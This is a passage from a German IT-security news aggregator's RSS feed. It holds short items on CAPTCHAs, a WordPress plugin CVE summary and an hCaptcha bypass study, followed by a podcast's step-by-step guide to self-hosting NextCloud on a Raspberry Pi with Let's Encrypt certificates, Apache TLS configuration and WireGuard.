golang-github-prometheus-tsdb, golang-github-quay-goval-parser, golang-github-rakyll-statik, golang-github-rcrowley-metrics, golang-github-redteampentesting-monsoon, golang-github-rickb777-date, golang-github-rogpeppe-internal, golang-github-rwcarlsen-goexif, golang-github-schollz-croc, golang-github-schollz-mnemonicode, golang-github-segmentio-ksuid, golang-github-shellcode33-vm-detection, golang-github-shopify-sarama, golang-github-shopify-toxiproxy, golang-github-shulhan-bindata, golang-github-shurcool-vfsgen, golang-github-skip2-qrcode, golang-github-skynetservices-skydns, golang-github-snappy, golang-github-sophaskins-efs2tar, golang-github-sourcegraph-syntaxhighlight, golang-github-spyzhov-ajson, golang-github-sqshq-sampler, golang-github-task, golang-github-tdewolff-minify, golang-github-temoto-robotstxt, golang-github-theoapp-theo-agent, golang-github-theupdateframework-notary, golang-github-tinylib-msgp, golang-github-tklauser-numcpus, golang-github-tomnomnom-xtermcolor, golang-github-tscholl2-siec, golang-github-twitchtv-twirp, golang-github-twpayne-waypoint, golang-github-u-root-iscsinl, golang-github-uber-athenadriver, golang-github-uber-jaeger-client, golang-github-ulikunitz-xz, golang-github-valyala-fasthttp, golang-github-vbatts-tar-split, golang-github-vincent-petithory-dataurl, golang-github-xo-terminfo, golang-github-xordataexchange-crypt, golang-github-yuin-gopher-lua, golang-github-zyedidia-highlight, golang-gitlab-commonmark-linkify, golang-google-appengine, golang-google-protobuf, golang-gopkg-neurosnap-sentences-1, golang-gopkg-square-jose-2, golang-gopkg-src-d-git-4, golang-honnef-tools, golang-jaytaylor-html2text, golang-k8s-apiextensions-apiserver, golang-k8s-code-generator, golang-k8s-kube-aggregator, golang-k8s-kube-openapi, golang-k8s-pod-security-admission, golang-k8s-sample-apiserver, golang-k8s-sample-cli-plugin, golang-k8s-sample-controller, golang-mongodb-mongo-driver, golang-mvdan-sh-3, golang-mvdan-xurls, golang-rsc-pdf, golang-sourcegraph-appdash, golang-starlark, golang-storj-drpc, golang-vbom-util, golang-x-debug, golang-x-exp, golang-x-lint, golang-x-mod, golang-x-perf, golang-x-text, golang-x-tools, golist, goloris, gomtree, google-guest-agent, gotags, gotun, grafana, gron, grpcurl, hakrevdns, hcloud, htmltest, httprobe, hulk, ignition, jid, kata-containers, kiln, kompose, kubernetes, libldb, manifest-tool, mass3, meg, meshbird, micro, mingw-harfbuzz, mingw-poppler, moby-engine, mqttcli, nats-server, nebula, netscanner, oci-seccomp-bpf-hook, ohmybackup, onionscan, open-policy-agent, origin, osbuild-composer, podman-tui, popub, powerline-go, reposurgeon, restic, runc, samba, shellz, shhgit, skopeo, snapd, snowcrash, source-to-image, subfinder, syncthing, sysutil, terrier, thunderbird, tiedot, toolbox, vgrep, vultr, vultr-cli, webanalyze, webkit2gtk3, weldr-client, wgctrl, xe-guest-utilities-latest, xen, xq, yggdrasil, and yubihsm-connector), <b>Mageia</b> (chromium-browser-stable, firefox, gdk-pixbuf2.0, python-ujson, and webmin), <b>Red Hat</b> (firefox and thunderbird), <b>Slackware</b> (gnutls), and <b>SUSE</b> (chromium, firefox, mozilla-nss, rubygem-tzinfo, samba, and xen).]]></content:encoded>
</item>
<item>
<title><![CDATA[Ich bin kein Roboter: Apple sagt nervigen Captchas den Kampf an]]></title>
<description><![CDATA[Apple versucht mit dem Update auf iOS 16 nicht nur Passwörter neu zu erfinden, sondern auch ein nerviges Problem aus der Internet-Welt zu schaffen - Captcha-Eingaben. Unlesbare Codes und "Ich bin kein Roboter"-Rätsel könnten somit bald der Vergangenheit angehören.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/1548609/it-security-nachrichten/ich-bin-kein-roboter-apple-sagt-nervigen-captchas-den-kampf-an/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1548609/it-security-nachrichten/ich-bin-kein-roboter-apple-sagt-nervigen-captchas-den-kampf-an/</guid>
<pubDate>Wed, 22 Jun 2022 10:03:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,130340.html"><img hspace="5" border="0" align="left" alt="Logo, Captcha, Recaptcha, Captchas, v3" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/57379.jpg"></a>
			Apple versucht mit dem Update auf iOS 16 nicht nur Passwörter neu zu erfinden, sondern auch ein nerviges Problem aus der Internet-Welt zu schaffen - Captcha-Eingaben. Unlesbare Codes und "Ich bin kein Roboter"-Rätsel könnten somit bald der Vergangenheit angehören.			(<a href="https://winfuture.de/news,130340.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Google reCAPTCHA soll vor geleakten Passwörter warnen]]></title>
<description><![CDATA[Von Kriminellen erbeutete Anmeldeinformationen soll reCAPTCHA künftig erkennen und Nutzer hierauf hinweisen. Die Funktion steht allen Enterprise-Kunden offen.]]></description>
<link>https://tsecurity.de/de/1541015/it-nachrichten/google-recaptcha-soll-vor-geleakten-passwoerter-warnen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1541015/it-nachrichten/google-recaptcha-soll-vor-geleakten-passwoerter-warnen/</guid>
<pubDate>Tue, 14 Jun 2022 18:35:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Von Kriminellen erbeutete Anmeldeinformationen soll reCAPTCHA künftig erkennen und Nutzer hierauf hinweisen. Die Funktion steht allen Enterprise-Kunden offen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Prove you're human...by participating in ML projects]]></title>
<description><![CDATA[Is there any linux way around these stupid reCaptcha things? I'm long past the line of annoyed at proving I'm human by teaching a machine how to recognize traffic lights.  ​ Anyone know a good browser plugin or something?    submitted by    /u/AccomplishedHornet5  [link]   [comments]]]></description>
<link>https://tsecurity.de/de/1517018/linux-tipps/prove-youre-humanby-participating-in-ml-projects/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1517018/linux-tipps/prove-youre-humanby-participating-in-ml-projects/</guid>
<pubDate>Wed, 11 Aug 2021 16:30:12 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Is there any linux way around these stupid reCaptcha things? I'm long past the line of annoyed at proving I'm human by teaching a machine how to recognize traffic lights. </p> <p>​</p> <p>Anyone know a good browser plugin or something?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/AccomplishedHornet5"> /u/AccomplishedHornet5 </a> <br><span><a href="https://www.reddit.com/r/linux/comments/p2drl2/prove_youre_humanby_participating_in_ml_projects/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/p2drl2/prove_youre_humanby_participating_in_ml_projects/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nur ein PDF? Wie (un)sicher der grüne Pass wirklich ist]]></title>
<description><![CDATA[Die Kritik an der technischen Umsetzung des grünen Passes geht am Thema vorbei. Auch Datenschützer sind mit der gewählten Lösung zufrieden

					
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('https://images.derstandard.at/img/2021/06/22/qrcode.jpg');
									});]]></description>
<link>https://tsecurity.de/de/1510849/it-nachrichten/nur-ein-pdf-wie-unsicher-der-gruene-pass-wirklich-ist/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1510849/it-nachrichten/nur-ein-pdf-wie-unsicher-der-gruene-pass-wirklich-ist/</guid>
<pubDate>Sat, 26 Jun 2021 15:02:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://images.derstandard.at/img/2021/06/22/qrcode.jpg?w=150&amp;s=69fc4d4d">Die Kritik an der technischen Umsetzung des grünen Passes geht am Thema vorbei. Auch Datenschützer sind mit der gewählten Lösung zufrieden<div id="ytplayer_https://images.derstandard.at/img/2021/06/22/qrcode.jpg"></div>

					<script>
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('https://images.derstandard.at/img/2021/06/22/qrcode.jpg');
									}); 
									</script>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-24189]]></title>
<description><![CDATA[Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the Captchinoo, Google recaptcha for admin login page WordPress plugin before 2.4, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin fro...]]></description>
<link>https://tsecurity.de/de/1472111/sicherheitsluecken/cve-2021-24189/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1472111/sicherheitsluecken/cve-2021-24189/</guid>
<pubDate>Fri, 14 May 2021 16:31:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the Captchinoo, Google recaptcha for admin login page WordPress plugin before 2.4, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare Says New hCaptcha Bypass Doesn't Impact its Implementation]]></title>
<description><![CDATA[Web infrastructure and website security provider Cloudflare told The Record last week that a recent academic paper detailing a method to bypass the hCaptcha image-based challenge system does not impact its implementation. From the report: The research paper, published last month by two academics ...]]></description>
<link>https://tsecurity.de/de/1430284/it-security-nachrichten/cloudflare-says-new-hcaptcha-bypass-doesnt-impact-its-implementation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1430284/it-security-nachrichten/cloudflare-says-new-hcaptcha-bypass-doesnt-impact-its-implementation/</guid>
<pubDate>Mon, 05 Apr 2021 22:15:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Web infrastructure and website security provider Cloudflare told The Record last week that a recent academic paper detailing a method to bypass the hCaptcha image-based challenge system does not impact its implementation. From the report: The research paper, published last month by two academics from the University of Louisiana at Lafayette, targets hCaptcha, a CAPTCHA service that replaced Google's reCAPTCHA in Cloudflare's website protection systems last year. In a paper titled "A Low-Cost Attack against the hCaptcha System," researchers said they devised an attack that uses browser automation tools, image recognition, image classifiers, and machine learning algorithms to download hCaptcha puzzles, identify the content of an image, classify the image, and then solve the CAPTCHA's challenge. Academics said their attack worked with a 95.93% accuracy rate and took around 18.76 seconds on average to crack an hCaptcha challenge.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Cloudflare+Says+New+hCaptcha+Bypass+Doesn't+Impact+its+Implementation%3A+https%3A%2F%2Fbit.ly%2F3fIOAPD"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fit.slashdot.org%2Fstory%2F21%2F04%2F05%2F1928246%2Fcloudflare-says-new-hcaptcha-bypass-doesnt-impact-its-implementation%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://it.slashdot.org/story/21/04/05/1928246/cloudflare-says-new-hcaptcha-bypass-doesnt-impact-its-implementation?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR3289: NextCloud the hard way]]></title>
<description><![CDATA[NextCloud
I want to install NextCloud for my family, but only for my family. This means making things hard for myself by installing it behind my firewall with a private nat ipaddress. That presented problems with getting a valid Let's encrypt cert.
It all now works, and thanks to timttmy I was ...]]></description>
<link>https://tsecurity.de/de/1405369/podcasts/hpr3289-nextcloud-the-hard-way/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1405369/podcasts/hpr3289-nextcloud-the-hard-way/</guid>
<pubDate>Thu, 11 Mar 2021 00:30:51 +0100</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>NextCloud</h1>
<p>I want to install NextCloud for my family, but <strong>only</strong> for my family. This means making things hard for myself by installing it behind my firewall with a private nat ipaddress. That presented problems with getting a valid <a href="https://letsencrypt.org/">Let's encrypt</a> cert.</p>
<p>It all now works, and thanks to timttmy I was able to get the WireGuard VPN installed and working.</p>
<h2>Pi 4</h2>
<p>Get a Pi, and a SSD, enable it. You should review <a href="https://jamesachambers.com/raspberry-pi-4-usb-boot-config-guide-for-ssd-flash-drives/">Raspberry Pi 4 USB Boot Config Guide for SSD / Flash Drives</a>, for issues with SSD drives and the Raspberry Pi.</p>
<p>You can install Raspbian as normal. I already covered this in <a href="http://hackerpublicradio.org/eps.php?id=2356">hpr2356 :: Safely enabling ssh in the default Raspbian Image</a>, and <a href="https://github.com/kenfallon/fix-ssh-on-pi">Safely enabling ssh in the default Raspberry Pi OS (previously called Raspbian) Image</a>.</p>
<p>And then follow the instructions in <a href="https://www.tomshardware.com/how-to/boot-raspberry-pi-4-usb">How to Boot Raspberry Pi 4 From a USB SSD or Flash Drive</a>.</p>
<h2>Next Cloud</h2>
<p>Install Apache, MariaDB, and PHP</p>
<ul>
<li><a href="https://www.techrepublic.com/article/how-to-install-nextcloud-20-on-ubuntu-server-20-04/">How to install Nextcloud 20 on Ubuntu Server 20.04</a></li>
<li><a href="https://docs.nextcloud.com/server/20/admin_manual/installation/source_installation.html">NextCloud - Installation and server configuration - Installation on Linux</a></li>
<li><a href="https://nextcloud.com/install/#instructions-server">Download NextCloud</a></li>
</ul>
<pre><code># diff /etc/apache2/apache2.conf /etc/apache2/apache2.conf.orig
171,172c171,172
&lt;       Options FollowSymLinks
&lt;       AllowOverride All
---
&gt;       Options Indexes FollowSymLinks
&gt;       AllowOverride None</code></pre>
<h3>Install PHPMyAdmin</h3>
<ul>
<li><a href="https://pimylifeup.com/raspberry-pi-phpmyadmin/">How to Install PHPMyAdmin on the Raspberry Pi</a></li>
</ul>
<h3>Required Changes to nextcloud config.</h3>
<pre><code>root@nextcloud:~# diff /root/nextcloud-config.php.orig /var/www/html/nextcloud/config/config.php 
&gt;     1 =&gt; 'nextcloud',
&gt;     2 =&gt; '192.168.123.123',
&gt;     3 =&gt; 'nextcloud.example.com',
&gt;   'memcache.local' =&gt; '\OC\Memcache\APCu',</code></pre>
<pre><code># diff /etc/apache2/sites-available/000-default.conf.orig /etc/apache2/sites-enabled/000-default.conf
28a29,32
&gt;         RewriteEngine On
&gt;         RewriteRule ^(.*)$ https://%{HTTP_HOST}$1 [R=301,L]
&gt;       Redirect 301 /.well-known/carddav /var/www/html/nextcloud/remote.php/dav
&gt;       Redirect 301 /.well-known/caldav /var/www/html/nextcloud/remote.php/dav</code></pre>
<h3>Required Changes to <code>php.ini</code> config.</h3>
<pre><code>root@nextcloud:~# diff /etc/php/7.3/apache2/php.ini.orig /etc/php/7.3/apache2/php.ini
401c401
&lt; memory_limit = 128M
---
&gt; memory_limit = 2000M
689c689
&lt; post_max_size = 8M
---
&gt; post_max_size = 2048M
841c841
&lt; upload_max_filesize = 2M
---
&gt; upload_max_filesize = 2048M</code></pre>
<h3>Upgrade</h3>
<p>You can upgrade using the procedure described by <a href="http://hackerpublicradio.org/correspondents.php?hostid=78">klaatu</a> in <a href="http://hackerpublicradio.org/eps.php?id=3232">hpr3232 :: Nextcloud</a>, or as admin via the UI <code>https://nextcloud.example.com/nextcloud/index.php/settings/user</code>, Administration, Overview.</p>
<p>You will see a lot of <a href="https://docs.nextcloud.com/server/12/admin_manual/configuration_server/security_setup_warnings.html">Warnings on Admin Page</a>, but don't panic. The server is not accessible on the Internet after all.</p>
<p>The errors have links to how you can fix them and some are very easy to do.</p>
<p>I got an error "Error occurred while checking server setup". I used this <a href="https://help.nextcloud.com/t/solved-12-0-2-to-12-0-3-update-failes-at-create-backup/21490">tip</a> to move root owned files out of next cloud dir.</p>
<p>For me it was mostly about enabling caching via <a href="https://docs.nextcloud.com/server/12/admin_manual/configuration_server/caching_configuration.html#id1">APCU</a>, and enabling <a href="https://docs.nextcloud.com/server/12/admin_manual/configuration_server/security_setup_warnings.html#you-are-accessing-this-site-via-http">You are accessing this site via HTTP</a>.</p>
<p>The first is fixed in the <code>nextcloud/config/config.php</code> page, the next is fixed by installing a valid SSL cert from Let's Encrypt.</p>
<h2>SSL Let's Encrypt</h2>
<p>Based on the following article I installed it manually.</p>
<p><a href="https://code.luasoftware.com/tutorials/lets-encrypt/obtain-lets-encrypt-ssl-using-manual-dns-verification/">Obtain Let's Encrypt SSL Certificate Using Manual DNS Verification</a></p>
<h3>Install certbot</h3>
<pre><code># apt install certbot</code></pre>
<p>Then run the script manually specifying that the challenge should be over dns.</p>
<pre><code># certbot certonly --manual --preferred-challenges dns 
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator manual, Installer None
Enter email address (used for urgent renewal and security notices) (Enter 'c' to
cancel): letsencrypt@example.com

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Please read the Terms of Service at
https://letsencrypt.org/documents/LE-SA-v1.2-November-15-2017.pdf. You must
agree in order to register with the ACME server at
https://acme-v02.api.letsencrypt.org/directory
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(A)gree/(C)ancel: A

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Would you be willing to share your email address with the Electronic Frontier
Foundation, a founding partner of the Let's Encrypt project and the non-profit
organization that develops Certbot? We'd like to send you email about our work
encrypting the web, EFF news, campaigns, and ways to support digital freedom.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(Y)es/(N)o: n
Please enter in your domain name(s) (comma and/or space separated)  (Enter 'c'
to cancel): nextcloud.example.com
Obtaining a new certificate
Performing the following challenges:
dns-01 challenge for nextcloud.example.com

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
NOTE: The IP of this machine will be publicly logged as having requested this
certificate. If you're running certbot in manual mode on a machine that is not
your server, please ensure you're okay with that.

Are you OK with your IP being logged?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(Y)es/(N)o: y

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Please deploy a DNS TXT record under the name
_acme-challenge.nextcloud.example.com with the following value:

0c5dbJpS5t0VKzglhdfFhZ6CGmZlLHNaNnAQe2VeJyKi

Before continuing, verify the record is deployed.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Press Enter to Continue</code></pre>
<p>It was at this point I went to my hosting companys page and created a subdomain called <code>nextcloud</code>. Then I added a <code>TXT</code> record called <code>_acme-challenge</code> with the text <code>0c5dbJpS5t0VKzglhdfFhZ6CGmZlLHNaNnAQe2VeJyKi</code>.</p>
<p>In order to verify that we use the command:</p>
<pre><code># apt-get install -y dnsutils

$ dig -t TXT _acme-challenge.nextcloud.example.com

; &lt;&lt;&gt;&gt; DiG 9.11.5-P4-5.1+deb10u2-Debian &lt;&lt;&gt;&gt; -t TXT _acme-challenge.nextcloud.example.com
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 39298
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;_acme-challenge.nextcloud.example.com. IN TXT

;; ANSWER SECTION:
_acme-challenge.nextcloud.example.com. 3600 IN TXT "0c5dbJpS5t0VKzglhdfFhZ6CGmZlLHNaNnAQe2VeJyKi"

;; Query time: 7 msec
;; SERVER: 178.21.112.12#53(178.21.112.12)
;; WHEN: Thu Dec 10 16:27:53 CET 2020
;; MSG SIZE  rcvd: 121
</code></pre>
<p>Now that the answer section is correct we can continue with the <code>certbot</code> script.</p>
<pre><code>Waiting for verification...
Cleaning up challenges

IMPORTANT NOTES:
 - Congratulations! Your certificate and chain have been saved at:
   /etc/letsencrypt/live/nextcloud.example.com/fullchain.pem
   Your key file has been saved at:
   /etc/letsencrypt/live/nextcloud.example.com/privkey.pem
   Your cert will expire on 2021-03-10. To obtain a new or tweaked
   version of this certificate in the future, simply run certbot
   again. To non-interactively renew *all* of your certificates, run
   "certbot renew"
 - If you like Certbot, please consider supporting our work by:

   Donating to ISRG / Let's Encrypt:   https://letsencrypt.org/donate
   Donating to EFF:                    https://eff.org/donate-le</code></pre>
<h3>Renew</h3>
<p>Unfortunately the renew is not automatic. <a href="https://webmasters.stackexchange.com/questions/116316/could-not-renew-letsencrypt-certificate-error-the-manual-plugin-is-not-working">"You don't have to renew Certificate with"renew" option. You have to run the same command you ran for Certificate creation."</a></p>
<p>So I just set up a 3 monthly recurring reminder in NextCloud to do this.</p>
<h3>Delete</h3>
<p>If you need to delete the cert you can do it as follows.</p>
<pre><code>root@nextcloud:~# certbot certificates
Saving debug log to /var/log/letsencrypt/letsencrypt.log

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Found the following certs:
  Certificate Name: nextcloud.example.com
    Domains: nextcloud.example.com
    Expiry Date: 2021-03-10 14:28:07+00:00 (VALID: 89 days)
    Certificate Path: /etc/letsencrypt/live/nextcloud.example.com/fullchain.pem
    Private Key Path: /etc/letsencrypt/live/nextcloud.example.com/privkey.pem
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
root@nextcloud:~# certbot delete
Saving debug log to /var/log/letsencrypt/letsencrypt.log

Which certificate(s) would you like to delete?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
1: nextcloud.example.com
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Select the appropriate numbers separated by commas and/or spaces, or leave input
blank to select all options shown (Enter 'c' to cancel): 1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Deleted all files relating to certificate nextcloud.example.com.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</code></pre>
<h2>Apache setup</h2>
<p>Setting up Apache is not well explained anywhere I could find.</p>
<p>The good news is that <a href="https://ssl-config.mozilla.org/#server=apache&amp;version=2.4.41&amp;config=intermediate&amp;openssl=1.1.1d&amp;guideline=5.6">moz://a SSL Configuration Generator</a> page takes the misery out of making tea. I mean, it will help you with your configuration. If you do like misery you can of course read the <a href="https://wiki.mozilla.org/Talk:Security/Server_Side_TLS">Talk:Security/Server Side TLS</a> page.</p>
<p>The most helpful articles were:</p>
<ul>
<li><a href="https://linuxize.com/post/secure-apache-with-let-s-encrypt-on-debian-10/">Secure Apache with Let's Encrypt on Debian 10</a></li>
<li><a href="https://develike.com/en/articles/adding-a-trusted-self-signed-ssl-certificate-to-apache-on-debian-ubuntu">Adding a trusted self-signed SSL certificate to Apache on Debian/Ubuntu</a></li>
<li><a href="https://www.digitalocean.com/community/tutorials/how-to-create-a-self-signed-ssl-certificate-for-apache-in-debian-10">How To Create a Self-Signed SSL Certificate for Apache in Debian 10</a></li>
</ul>
<p>I made the following changes:</p>
<pre><code>root@nextcloud:/etc/apache2/sites-available# diff 000-default.conf.orig 000-default.conf
28a29,30
&gt;         RewriteEngine On
&gt;         RewriteRule ^(.*)$ https://%{HTTP_HOST}$1 [R=301,L]

root@nextcloud:/etc/apache2/sites-available# diff default-ssl.conf.orig default-ssl.conf
32,33c32,33
&lt;               SSLCertificateFile      /etc/ssl/certs/ssl-cert-snakeoil.pem
&lt;               SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key
---
&gt;               SSLCertificateFile      /etc/letsencrypt/live/nextcloud.example.com/fullchain.pem
&gt;               SSLCertificateKeyFile   /etc/letsencrypt/live/nextcloud.example.com/privkey.pem
129a130,131
&gt;               # enable HTTP/2, if available
&gt;               Protocols h2 http/1.1
130a133,134
&gt;               # HTTP Strict Transport Security (mod_headers is required) (63072000 seconds)
&gt;               Header always set Strict-Transport-Security "max-age=63072000"</code></pre>
<h2>Testing</h2>
<p>To test the cert you can connect to the localhost on the server.</p>
<pre><code>root@nextcloud:/etc/apache2/sites-available# openssl s_client -crlf -debug -connect localhost:443 -status -servername nextcloud.example.com
CONNECTED(00000003)
write to 0x643cf8 [0x652568] (321 bytes =&gt; 321 (0x141))
[snip...]
read from 0x643cf8 [0x6492b3] (5 bytes =&gt; 5 (0x5))
0000 - 48 54 54 50 2f                                    HTTP/
3069898768:error:1408F10B:SSL routines:ssl3_get_record:wrong version number:../ssl/record/ssl3_record.c:332:
---
no peer certificate available
---
No client certificate CA names sent
---
SSL handshake has read 5 bytes and written 321 bytes
Verification: OK
---
New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 0 (ok)
---
[snip...]</code></pre>
<p>I had been using <code>systemctl restart apache2.service</code> to restart apache, but the recommended way is to use <code>apache2ctl</code>.</p>
<pre><code>root@nextcloud:/etc/apache2/sites-available# apache2ctl 
Usage: /usr/sbin/apache2ctl start|stop|restart|graceful|graceful-stop|configtest|status|fullstatus|help
       /usr/sbin/apache2ctl &lt;apache2 args&gt;
       /usr/sbin/apache2ctl -h            (for help on &lt;apache2 args&gt;)

root@nextcloud:/etc/apache2/sites-available# apache2ctl restart
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message

root@nextcloud:/etc/apache2/sites-available# apache2 -t
[Thu Dec 10 18:18:49.187628 2020] [core:warn] [pid 4108] AH00111: Config variable ${APACHE_RUN_DIR} is not defined
apache2: Syntax error on line 80 of /etc/apache2/apache2.conf: DefaultRuntimeDir must be a valid directory, absolute or relative to ServerRoot</code></pre>
<p>For some reason that fixed it.</p>
<pre><code># openssl s_client -crlf -debug -connect localhost:443 -status -servername nextcloud.example.com
CONNECTED(00000003)
write to 0xe4918 [0xf3188] (324 bytes =&gt; 324 (0x144))
[snip...]
OCSP response: 
======================================
OCSP Response Data:
    OCSP Response Status: successful (0x0)
    Response Type: Basic OCSP Response
    Version: 1 (0x0)
    Responder Id: C = US, O = Let's Encrypt, CN = R3
    Produced At: Dec 22 16:04:00 2020 GMT
[snip...]
---
Certificate chain
 0 s:CN = nextcloud.example.com
   i:C = US, O = Let's Encrypt, CN = R3
 1 s:C = US, O = Let's Encrypt, CN = R3
   i:O = Digital Signature Trust Co., CN = DST Root CA X3
---
Server certificate
-----BEGIN CERTIFICATE-----
[snip...]</code></pre>
<h2>DNS Rebind Protection</h2>
<p>Now that everything is up and running we just need to create a new <code>A</code> record pointing to our internal IP Address. Unfortunately while <code>nextcloud.example.com</code> resolves to <code>192.168.123.123</code> externally, it fails to return an answer internally.</p>
<p>A little investigation lead to the fact that my <a href="https://en.avm.de/service/fritzbox/fritzbox-7390/knowledge-base/publication/show/663_No-DNS-resolution-of-private-IP-addresses/">firewall</a>, was seeing this as a <a href="https://en.wikipedia.org/wiki/DNS_rebinding">DNS Rebinding</a> attack. It correctly blocks these DNS entires. I was able to add an exception under <code>Network &gt; DHCP &gt; Rebind protection &gt; Discard upstream RFC1918 responses</code>.</p>
<p>On your router you should check under DHCP/DNS entries for <code>RFC1918</code> or <code>DNS Rebinding</code>.</p>
<p>You can verify your install as follows:</p>
<pre><code># apt-get install -y dnsutils

$ dig nextcloud.example.com

; &lt;&lt;&gt;&gt; DiG 9.16.8-Debian &lt;&lt;&gt;&gt; nextcloud.example.com
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 29350
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;nextcloud.example.com.          IN      A

;; ANSWER SECTION:
nextcloud.example.com.   3600    IN      A       192.168.123.123

;; Query time: 40 msec
;; SERVER: 192.168.0.71#53(192.168.0.71)
;; WHEN: Thu Dec 10 16:53:39 GMT 2020
;; MSG SIZE  rcvd: 65</code></pre>
<h2>Completing</h2>
<p>Back in the admin console you should keep upgrading, and fixing errors until it says <code>Your version is up to date.</code> and <code>All checks passed.</code></p>
<p>At this point you are ready to open the server up to your users while they are outside the home, in work or school.</p>
<h1>Firewall setup</h1>
<p>timttmy has already done an episode on WireGuard where he goes into the details of how to install it manually.</p>
<p>I cheated and used the <a href="https://www.pivpn.io/">PIVPN</a> which now supports wireguard.</p>
<p>This is a good walkthrough with screenshots in the article <a href="https://pimylifeup.com/raspberry-pi-wireguard/">Setting up a WireGuard VPN on the Raspberry Pi</a>.</p>
<p>Once that's done you should have the following commands available.</p>
<pre><code># pivpn
::: Control all PiVPN specific functions!
:::
::: Usage: pivpn &lt;command&gt; [option]
:::
::: Commands:
:::  -a,  add              Create a client conf profile
:::  -c,  clients          List any connected clients to the server
:::  -d,  debug            Start a debugging session if having trouble
:::  -l,  list             List all clients
:::  -qr, qrcode           Show the qrcode of a client for use with the mobile app
:::  -r,  remove           Remove a client
:::  -h,  help             Show this help dialog
:::  -u,  uninstall        Uninstall pivpn from your system!
:::  -up, update           Updates PiVPN Scripts
:::  -bk, backup           Backup VPN configs and user profiles
</code></pre>
<p>During the install process you will select a port to use. This port needs to be allowed in from the Internet to your internal server. Where this will be done is different for every router, but have a look around for <code>port forwarding</code> or <code>permit access</code> to do this.</p>
<h1>Setting up Client on LineageOS</h1>
<p>It is at this point that you will need to have accounts created in NextCloud.</p>
<ul>
